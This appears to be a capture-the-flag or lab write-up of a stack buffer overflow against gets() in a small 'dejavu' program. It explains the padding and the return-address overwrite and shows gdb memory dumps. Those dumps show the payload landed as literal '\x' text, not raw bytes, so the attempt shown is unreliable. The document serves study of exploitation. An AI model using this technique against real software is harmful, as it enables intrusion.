The vulnerability lies in the C function gets() when called on the arg door. 
door is a buffer of size = 8 bytes and gets() would allow a buffer overflow using door
to write to the stack. More specifically, I wanted to pad the buffer of 8 bytes + another
8 bytes + 4 bytes of the $ebp register, with char "A". So I padded the stack with 20 "A"'s 
chars until I reached the return address. Once I'm at the return address, I filled those 
4 bytes of the return address with 4 bytes of the memory address of the shell code (which
is at $ebp + 8). 

vsftpd@pwnable:~$ invoke -d dejavu
(gdb) run
Starting program: /home/vsftpd/dejavu 
Breakpoint 1, deja_vu () at dejavu.c:7
7	  gets(door);
(gdb) x/20x door
0xbffffc68:	0xbffffd2c	0xb7e5f225	0xb7fed270	0x00000000
0xbffffc78:	0xbffffc88	0x0804842a	0x08048440	0x00000000
0xbffffc88:	0x00000000	0xb7e454d3	0x00000001	0xbffffd24
0xbffffc98:	0xbffffd2c	0xb7fdc858	0x00000000	0xbffffd1c
0xbffffca8:	0xbffffd2c	0x00000000	0x0804821c	0xb7fd2000
(gdb) x/20x $ebp
0xbffffc78:	0xbffffc88	0x0804842a	0x08048440	0x00000000
0xbffffc88:	0x00000000	0xb7e454d3	0x00000001	0xbffffd24
0xbffffc98:	0xbffffd2c	0xb7fdc858	0x00000000	0xbffffd1c
0xbffffca8:	0xbffffd2c	0x00000000	0x0804821c	0xb7fd2000
0xbffffcb8:	0x00000000	0x00000000	0x00000000	0x64aaa644
(gdb) x/20x door
0xbffffc68:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc78:	0x41414141	0x3038785c	0x6366785c	0x6666785c
0xbffffc88:	0x6662785c	0x6265785c	0x6631785c	0x6535785c
0xbffffc98:	0x3938785c	0x3637785c	0x3830785c	0x3133785c
0xbffffca8:	0x3063785c	0x3838785c	0x3634785c	0x3730785c
(gdb) x/20x $ebp
0xbffffc78:	0x41414141	0x3038785c	0x6366785c	0x6666785c
0xbffffc88:	0x6662785c	0x6265785c	0x6631785c	0x6535785c
0xbffffc98:	0x3938785c	0x3637785c	0x3830785c	0x3133785c
0xbffffca8:	0x3063785c	0x3838785c	0x3634785c	0x3730785c
0xbffffcb8:	0x3938785c	0x3634785c	0x6330785c	0x3062785c
(gdb) x/20x $ebp+4
0xbffffc7c:	0x3038785c	0x6366785c	0x6666785c	0x6662785c
0xbffffc8c:	0x6265785c	0x6631785c	0x6535785c	0x3938785c
0xbffffc9c:	0x3637785c	0x3830785c	0x3133785c	0x3063785c
0xbffffcac:	0x3838785c	0x3634785c	0x3730785c	0x3938785c
0xbffffcbc:	0x3634785c	0x6330785c	0x3062785c	0x6230785c
(gdb) x/20x $ebp+8
0xbffffc80:	0x6366785c	0x6666785c	0x6662785c	0x6265785c
0xbffffc90:	0x6631785c	0x6535785c	0x3938785c	0x3637785c
0xbffffca0:	0x3830785c	0x3133785c	0x3063785c	0x3838785c
0xbffffcb0:	0x3634785c	0x3730785c	0x3938785c	0x3634785c
0xbffffcc0:	0x6330785c	0x3062785c	0x6230785c	0x3938785c

